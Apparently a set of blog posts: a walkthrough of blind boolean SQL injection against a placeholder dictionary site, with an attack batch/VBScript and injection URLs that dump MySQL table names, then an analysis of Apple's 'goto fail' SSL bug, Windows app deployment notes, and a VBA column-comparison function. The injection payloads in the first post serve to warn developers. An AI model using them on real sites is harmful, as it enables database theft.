Anywhere there’s a table of data to be queried, whether it’s a dictionary of words, or a list of popular kitchen repair technicians, etc, etc.
Imagine I’ve got a dictionary searching page, weblexicon.example (that doesn’t exist, nor does weblexicon.com). Its main page offers me a field to provide a word, for which I want to see the definition.
If I give it a real word, it tells me the definition(s).
If I give it a non-existent word, it apologises for being unable to help me.
Seems like a database search is used here. Let’s see if it’s exploitable, by asking for “example’” – that’s “example” with an extra single quote at the end.
That’s pretty cool – we can tell now that the server is passing our information off to a MySQL server. Those things that look like double-quotes around the word ‘example’ are in fact two single-quotes. A bit confusing, but it helps to understand what’s going on here.
So, let’s feed the web lexicon a value that might exploit it. Sadly, it doesn’t accept multiple commands, and gives the “You have an error in your SQL syntax” message when I try it.
Worse still, for some reason I can’t use the “UNION” or “JOIN” operators to get more data than I’m allowed. This seems to be relatively common when there are extra parentheses, or other things we haven’t quite guessed about the command.
That means we’re stuck with Blind SQL injection. With a blind SQL injection, or Blind SQLi, you can generally see whether a value is true or false, by the response you get back. Remember our comparison of a word that does exist and a word that doesn’t? Let’s try that in a query to look up a true / false value:
So now, we can ask true / false questions against the database.
Seems rather limiting.
Let’s say we’re looking to see if the MySQL server is running a particular vulnerable version – we could ask for “example’ and @@version=’220.127.116.11” – a true response would give us the hint that we can exploit that vulnerability.
But the SQL language has so many other options. We can say “does your version number begin with a ‘4’?”
A bit more exciting, but still pedestrian.
What if I want to find out what the currently executing statement looks like? I could ask “is it an ‘a’? a ‘b’? a ‘c’?” and so on, but that is too slow.
Instead, I could ask for each bit of the characters, and that’s certainly a good strategy – but the one I chose is to simply do a binary search, which is computationally equivalent.
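The binary search idea can be sketched on its own, away from any web site. The snippet below is a Python illustration that makes no network requests: the in_range function is a local stand-in for the true / false answer, SECRET is a made-up value, and the 32 to 127 range is borrowed from the bounds that appear in the batch file.

```python
from typing import Callable, Tuple


def find_char_code(
    in_range: Callable[[int, int], bool], low: int = 32, high: int = 127
) -> Tuple[int, int]:
    """Find a character code using only yes/no questions.

    in_range(a, b) must answer "is the code between a and b inclusive?".
    Returns (code, number_of_questions_asked).
    """
    questions = 0
    while low < high:
        mid = (low + high) // 2
        questions += 1
        if in_range(low, mid):
            high = mid      # the code is in the lower half
        else:
            low = mid + 1   # the code is in the upper half
    return low, questions


SECRET = "users"  # hypothetical value that the questioner cannot see directly


def oracle_for(position: int) -> Callable[[int, int], bool]:
    """Local stand-in for the true / false response about one character."""
    def in_range(lo: int, hi: int) -> bool:
        return lo <= ord(SECRET[position]) <= hi
    return in_range


results = [find_char_code(oracle_for(i)) for i in range(len(SECRET))]
recovered = "".join(chr(code) for code, _ in results)
print(recovered, [asked for _, asked in results])
```

Each character in that range takes at most seven questions, against up to 95 when asking “is it an ‘a’? a ‘b’?” one value at a time.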
A fifteen-year-old vulnerability (SQL injection is older than that, but I couldn’t do the maths) deserves the same age of language to write my attack in.
So I chose batch file and VBScript (OK, they’re both older than 15). Batch files can’t actually download a web page, so that’s the part I wrote in VBScript.
And the fun thing to dump would be all of the table names. That way, we can see what we have to play with.
So here you go, a simple batch script to do Blind Boolean SQL injection to list all the tables in the system.
echo wscript.echo chr(wscript.arguments(0)) > charout.vbs
@cscript htget.vbs //nologo http://weblexicon.example/definition.php?query=example'+and+((select+table_name+from+information_schema.tables+limit+1+offset+%lasti%)+like+'%stem%%%')+and+1='1 >%out%
@findstr /c:"1. [n" %out%> nul || (
if "!last!" lss "!last2!" (
set /a lasti=!lasti!+1
@set /a mid = (%lower% + %higher%) / 2
@cscript htget.vbs //nologo http://weblexicon.example/definition.php?query=example'+and+(ascii(substring((select+table_name+from+information_schema.tables+limit+1+offset+%lasti%)+from+%nchars%+for+1))+between+%lower%+and+%mid%)+and+1='1 >%out%
@set /a nqueries=%nqueries%+1
@findstr /c:"1. [n" %out%> nul && (
set /a mid=%lower%-1
@set /a lower=%mid%+1
@if %lower% EQU 127 goto donecheck
@if %lower% NEQ %higher% goto check
@if %lower% EQU 32 @(set found= )
@for /f %%a in ('cscript charout.vbs //nologo %lower%') do @set found=%%a
@rem echo . | set /p foo=%found: =+%
@set /a nchars=%nchars%+1
@echo %lasti%: %stem%
@rem (%nqueries% queries)
@set /a lasti=!lasti!+1
And the output (demonstrating that there are still some concurrency issues to take care of):
Yes, that’s all it takes.
If you’re a developer of a web app which uses a relational database back-end, take note – it’s exactly this easy to dump your database contents. A few changes to the batch file, and I’m dumping column names and types, then individual items from tables.
And that’s all assuming I’m stuck with a blind SQL injection.
The weblexicon site lists table contents as its definitions, so in theory I should be able to use a UNION or a JOIN to add data from other tables into the definitions it displays. It’s made easier by the fact that I can also access the command I’m injecting into, by virtue of MySQL including that in a process table.
Note that if I’m attacking a different site with a different injection point, I need to make two changes to my batch script, and I’m away. Granted, this isn’t exactly sqlmap.py, but then again, sqlmap.py doesn’t always find or exploit all the vulns that you have available.
The takeaways today:
The code in this article is for demonstration purposes – I’m not going to explain how it works, although it is very simple. The only point of including it is to show that a small amount of code can be the cause of a huge extraction of your site’s data, but can be prevented by a small change.
Don’t use this code to do bad things. Don’t use other code to do bad things. Bad people are doing bad things with code like this (and better) already. Do good things with this code, and keep those bad people out.
Last week, Apple released a security update for iOS, indicating that the vulnerability being fixed is one that allows SSL / TLS connections to continue even though the server should not be authenticated. This is how they described it:
Impact: An attacker with a privileged network position may capture or modify data in sessions protected by SSL/TLS
Description: Secure Transport failed to validate the authenticity of the connection. This issue was addressed by restoring missing validation steps.
Secure Transport is their library for handling SSL / TLS, meaning that the bulk of applications written for these platforms would not adequately validate the authenticity of servers to which they are connected.
Ignore “An attacker with a privileged network position” – this is the very definition of a Man-in-the-Middle (MITM) attacker, and whereas we used to be more blasé about this in the past, when networking was done with wires, now that much of our use is wireless (possibly ALL in the case of iOS), the MITM attacker can easily insert themselves in the privileged position on the network.
The other reason to ignore that terminology is that SSL / TLS takes as its core assumption that it is protecting against exactly such a MITM. By using SSL / TLS in your service, you are noting that there is a significant risk that an attacker has assumed just such a privileged network position.
Also note that “failed to validate the authenticity of the connection” means “allowed the attacker to attack you through an encrypted channel which you believed to be secure”. If the attacker can force your authentication to incorrectly succeed, you believe you are talking to the right server, and you open an encrypted channel to the attacker. That attacker can then open an encrypted channel to the server to which you meant to connect, and echo your information straight on to the server, so you get the same behaviour you expect, but the attacker can see everything that goes on between you and your server, and modify whatever parts of that communication they choose.
So this lack of authentication is essentially a complete failure of your secure connection.
As always happens when a patch is released, within hours (minutes?) of the release, the patch has been reverse engineered, and others are offering their description of the changes made, and how they might have come about.
In this case, the reverse engineering was made easier by the availability of open source copies of the source code in use. Note that this is not an intimation that open source is, in this case, any less secure than closed source, because the patches can be reverse engineered quickly – but it does give us a better insight into exactly the code as it’s seen by Apple’s developers.
    if ((err = ReadyHash(&SSLHashSHA1, &hashCtx)) != 0)
        goto fail;
    if ((err = SSLHashSHA1.update(&hashCtx, &clientRandom)) != 0)
        goto fail;
    if ((err = SSLHashSHA1.update(&hashCtx, &serverRandom)) != 0)
        goto fail;
    if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0)
        goto fail;
        goto fail;
    if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0)
        goto fail;
Yes, that’s a second “goto fail”, which means that the last “if” is never reached, and the jump to ‘fail’ is always taken. Because the condition before it succeeded, however, the code at the ‘fail’ label runs with ‘err’ set to 0, which the caller reads as success.
So, of course, the Internet being what it is, the first reaction is to laugh at the clowns who made such a simple mistake, that looks so obvious.
T-shirts are printed with “goto fail; goto fail;” on them. Nearly 200 have been sold already (not for me – I don’t generally wear black t-shirts).
This is SSL code. You don’t get let loose on SSL code unless you’re pretty smart to begin with. You don’t get to work as a developer at Apple on SSL code unless you’re very smart.
Clearly “be smart” is already in evidence.
There is a possibility that this is too much in evidence – that the arrogance of those with experience and a track record may have led these guys to avoid some standard protective measures. The evidence certainly fits that view, but then many developers start with that perspective anyway, so in the spirit of working with the developers you have, rather than the ones you theorise might be possible, let’s see how to address this issue long term:
OK, so it’s considered macho to not rely on an IDE. I’ve never understood that. It’s rather like saying how much you prefer pounding nails in with your bare fists, because it demonstrates how much more of a man you are than the guy with a hammer. It doesn’t make sense when you compare how fast the job gets done, or the silly and obvious errors that turn up clearly when the IDE handles your indenting, colouring, and style for you.
Yes, colouring. I know, colour-blind people exist – and those people should adjust the colours in the IDE so that they make sense. Even a colour-blind person can get shade information to help them. I know syntax colouring often helps me spot when an XSS injection is just about ready to work, when I would otherwise have missed it in all the surrounding garbage of HTML code. The same is true when building code, you can spot when keywords are being interpreted as values, when string delimiters are accidentally unescaped, etc.
The same is true for indentation. Indentation, when it’s caused by your IDE based on parsing your code, rather than by yourself pounding the space bar, is a valuable indication of program flow. If your indentation doesn’t match control flow, it’s because you aren’t enforcing indentation with an automated tool.
Your IDE and your check-in process are a great place to enforce style standards to ensure that code is not confusing to the other developers on your team – or to yourself.
A little secret – one of the reasons I’m in this country in the first place is that I sent an eight-page fax to my bosses in the US, criticising their programming style and blaming (rightly) a number of bugs on the use of poor and inconsistent coding standards. This was true two decades ago using Fortran, and it’s true today in any number of different languages.
The style that was missed in this case – put braces around all your conditionally-executed statements.
I have other style recommendations that have worked for me in the past – meaningful variable names, enforced indenting, maximum level of indenting, comment guidelines, constant-on-the-left of comparisons, don’t include comparisons and assignments in the same line, one line does one thing, etc, etc.
Make sure you back the style requirements with statements as to what you are trying to do with the style recommendation. “Make the code look the same across the team” is a good enough reason, but “prevent incorrect flow” is better.
gcc has the option “-Wunreachable-code”.
gcc disabled the option in 2010.
gcc silently disabled the option, because they didn’t want anyone’s build to fail.
This is not (IMHO) a smart choice. If someone has a warning enabled, and has enabled the setting to produce a fatal error on warnings, they WANT their build to fail if that warning is triggered, and they WANT to know when that warning can no longer be relied upon.
So, without a warning on unreachable code, you’re basically screwed when it comes to control flow going where you don’t want it to.
And of course there’s the trouble that’s caused when you have dozens and dozens of warnings, so warnings are ignored. Don’t get into this state – every warning is a place where the compiler is confused enough by your code that it doesn’t know whether you intended to do that bad thing.
Let me stress – if you have a warning, you have confused the compiler.
This is a bad thing.
You can individually silence warnings (with plenty of comments in your code, please!) if you are truly in need of a confusing operation, but for the most part, it’s a great saving on your code cleanliness and clarity if you address the warnings in a smart and simple fashion.
The compiler has an optimiser.
It’s really good at its job.
It’s better than you are at optimising code, unless you’re going to get more than a 10-20% improvement in speed.
Making code shorter in its source form does not make it run faster. It may make it harder to read. For instance, this is a perfectly workable form of strstr:
const char * strstr(const char *s1, const char *s2)
Can you tell me if it has any bugs in it?
What’s its memory usage? Processor usage? How would you change it to make it work on case-insensitive comparisons? Does it overflow buffers?
Better still: does it compile to smaller or more performant code, if you rewrite it so that an entry-level developer can understand how it works?
Now go and read the implementation from your CRT. It’s much clearer, isn’t it?
Releasing the patch on Friday for iOS and on Tuesday for OS X may have actually been the correct move – but it brings home the point that you should time the release of your patches to get the best trade-off between having your customers patch the issue and having your attackers reverse engineer it and build attacks.
Where is the security announcement at Apple? I go to apple.com and search for “iOS 7.0.6 security update”, and I get nothing. It’d be really nice to find the bulletin right there. If it’s easier to find your documentation from outside your web site than from inside, you have a bad search engine.
People who know me may have the impression that I hate Apple. It’s a little more nuanced than that.
I accept that other people love their Apple devices. In many ways, I can understand why.
I have previously owned Apple devices – and I have tried desperately to love them, and to find why other people are so devoted to them. I have failed. My attempts at devotion are unrequited, and the device stubbornly avoids helping me do anything useful.
Instead of a MacBook Pro, I now use a ThinkPad. Instead of an iPad (remember, I won one for free!), I now use a Surface 2.
I feel like Steve Jobs turned to me and quoted Dr Frank N Furter: “I didn’t make him for you.”
So, no, I don’t like Apple products FOR ME. I’m fine if other people want to use them.
This article is simply about a really quick and easy example of how simple faults cause major errors, and what you can do, even as an experienced developer, to prevent them from happening to you.
Now that I have a Surface 2, I’m going to leave my laptop at home when I travel.
This leaves me with a concern – obviously, I’m going to play with some of my hobby software development while I have “down time”, but the devices for which I’m building are traveling with me, while the dev machine stays at home.
That’s OK where I’m building for the laptop, because it’s available by Remote Desktop through a Remote Desktop Gateway.
Deploying to my other devices – the Windows Phone and the Surface 2 running Windows RT – is something that I typically do by direct connection, or on the local network.
For the Windows Phone, there’s a Store called “Beta” as opposed to “Public”, into which you can deploy your app, make it available to specific listed users, and this will allow you to quickly distribute an app remotely to your device.
Details on how to do this are here.
The story on Windows Store apps appears, at first blush, to be far more dismal, with numerous questions online asking “is there a beta store for Windows like there is for the phone?”
The answer comes back “no, but that’s a great idea for future development”.
But it is completely possible to distribute app packages to your Windows RT and other Windows 8.1 devices, using Powershell.
The instructions at MSDN, here, will tell you quite clearly how you can do this.
I often need to compare two columns, and get a list in a third column of the items that are in one column, but not the other.
Every solution I find online has one common problem – the third column is full of blanks in between the items. I don’t want blanks. I want items.
So I wrote this function, which returns an array of the missing items – items which are in the first parameter, but not in the second.
I’m probably missing a trick or two (I’m particularly not happy with the extra element in the array that has to be deleted before the end), so please feel free to add to this in the comments.
Public Function Missing(ByRef l_ As Range, ByRef r_ As Range) As Variant()
    ' Returns a list of the items which are in l_ but not in r_
    ' Note that you need to put this formula into a range of cells as an array formula.
    ' So select a range, then type =Missing($A:$A,$B:$B), and press Ctrl-Shift-Enter
    ' If the range is too big, you'll get lots of N/A cells
    Dim i As Long               ' loop through l_
    Dim l_value As Variant      ' current value in l_
    Dim y() As Variant          ' Temp array to store values found
    ReDim y(0)
    For i = 1 To l_.Count       ' Loop through input
        l_value = l_.Cells(i, 1)            ' Get current value
        If Len(l_value) = 0 Then            ' Exit when current value is empty
            Exit For
        End If
        If r_.Find(l_value) Is Nothing Then ' Can't find current value => add it to the missing
            ReDim Preserve y(UBound(y) + 1) ' Change array size
            y(UBound(y) - 1) = l_value      ' Add current value to end
        End If
    Next i
    If UBound(y) < 1 Then       ' Nothing is missing, so there is nothing to return
        Exit Function           ' (a bare Return is not valid here in VBA)
    End If
    ReDim Preserve y(UBound(y) - 1)         ' Drop the unused extra element
    If Application.Caller.Rows.Count > 1 Then ' If we were called from a vertical selection
        Missing = Application.Transpose(y)  ' Transpose the array to a vertical mode.
    Else
        Missing = y                         ' otherwise just return the array horizontally.
    End If
End Function